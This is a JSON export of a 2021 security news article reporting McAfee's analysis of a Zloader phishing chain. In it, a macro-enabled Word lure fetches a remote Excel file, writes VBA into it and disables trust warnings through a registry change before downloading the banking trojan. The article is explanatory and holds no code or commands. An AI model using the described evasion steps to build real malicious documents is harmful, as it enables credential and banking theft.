{"id":42261,"date":"2021-07-09T13:35:47","date_gmt":"2021-07-09T13:35:47","guid":{"rendered":"http:\/\/icloud.pe\/blog\/?guid=7bd941f85d43b9497a4151c12d746238"},"modified":"2021-07-09T13:35:47","modified_gmt":"2021-07-09T13:35:47","slug":"new-zloader-malware-technique-makes-it-harder-to-spot-phishing-emails","status":"publish","type":"post","link":"https:\/\/icloud.pe\/blog\/new-zloader-malware-technique-makes-it-harder-to-spot-phishing-emails\/","title":{"rendered":"New Zloader malware technique makes it harder to spot phishing emails"},"content":{"rendered":"


\n Keumars Afifi-Sabet<\/a><\/span>
\n <\/span><\/p>\n

\n
\n
9 Jul, 2021<\/span><\/div>\n<\/p><\/div>\n<\/div>\n

\n<\/a><\/p>\n

\n

Hackers have been discovered using a new phishing technique that involves using a sequence of chained commands to hide malicious content and make email attachments appear harmless to filters.<\/p>\n

The technique involves send a phishing email<\/a> containing a seemingly innocuous Microsoft Word attachment, according to McAfee<\/a>.\u00a0Once opened, it triggers a chain of events that eventually downloads the\u00a0payload for the infamous banking and data exfiltration malware, known as Zloader<\/a>.<\/p>\n

\u200b<\/span><\/p>\n

The fact that the\u00a0document isn’t embedded with any malicious code will make it easier for phishing emails to bypass initial checks and malware scanners.<\/p>\n

Researchers have noted that users are only susceptible to infection if macros are enabled, which the phishing attack will use to trigger a series of commands once the Word document is opened.<\/p>\n

Macros are disabled by default in Microsoft Office<\/a>, so the Word document itself contains a lure designed to trick users into enabling macros, claiming that if they don\u2019t, the file won\u2019t load correctly.<\/p>\n

When the Word document opens, and macros are enabled, the document downloads and opens another password-protected Microsoft Excel file from a remote server.<\/p>\n

The Word document contains combo box components that store the content required to connect to the remote Excel document, including the Excel object, URL, and password required to open the file. The URL is stored in the combo box\u00a0in the form of broken strings, which are combined later to form a complete string.<\/p>\n

The code then attempts to download and open the Excel file stored in the malicious domain. After extracting the contents from the Excel cells, the Word file creates a Visual Basic for Applications (VBA) module in the downloaded Excel file by writing the retrieved contents. It, essentially, retrieves the cell contents and writes them to XLS macros.<\/p>\n

Once the macro is formed and ready, it modifies a RegKey to disable trust access for VBA on the victim\u2019s device in order to execute the malicious function without any Microsoft Office warnings. After writing macro contents to the Excel file, and disabling trust access, a function from the newly written excel VBA is called which downloads the Zloader payload.<\/p>\n

\u201cMalicious documents have been an entry point for most malware families and these attacks have been evolving their infection techniques and obfuscation, not just limiting to direct downloads of payload from VBA, but creating agents dynamically to download payload,\u201d McAfee\u2019s researchers Kiran Raj and Kishan N wrote.<\/p>\n

\u201cUsage of such agents in the infection chain is not only limited to Word or Excel, but further threats may use other living off the land tools to download its payloads. Due to security concerns, macros are disabled by default in Microsoft Office applications. We suggest it is safe to enable them only when the document received is from a trusted source.\u201d<\/p>\n

The operators of the Zloader malware are notorious for finding increasingly innovative ways of spreading their banking Trojan. The malware was found to be present in 100 coronavirus-related email campaigns<\/a> as of the first half of 2020. Zloader was also hiding within encrypted Excel documents, according to research published in March this year, with its operators overseeing invoice-related spam campaigns<\/a>.<\/p>\n

\u200b<\/span> <\/p>\n<\/p><\/div>\n","protected":false},"excerpt":{"rendered":"

Keumars Afifi-Sabet<\/p>\n

9 Jul, 2021 <\/p>\n

Hackers have been discovered using a new phishing technique that involves using a sequence of chained commands to hide malicious content and make email attachments appear harmless to filte…<\/p>\n","protected":false},"author":433,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-42261","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/posts\/42261","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/users\/433"}],"replies":[{"embeddable":true,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/comments?post=42261"}],"version-history":[{"count":1,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/posts\/42261\/revisions"}],"predecessor-version":[{"id":42262,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/posts\/42261\/revisions\/42262"}],"wp:attachment":[{"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/media?parent=42261"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/categories?post=42261"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/tags?post=42261"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}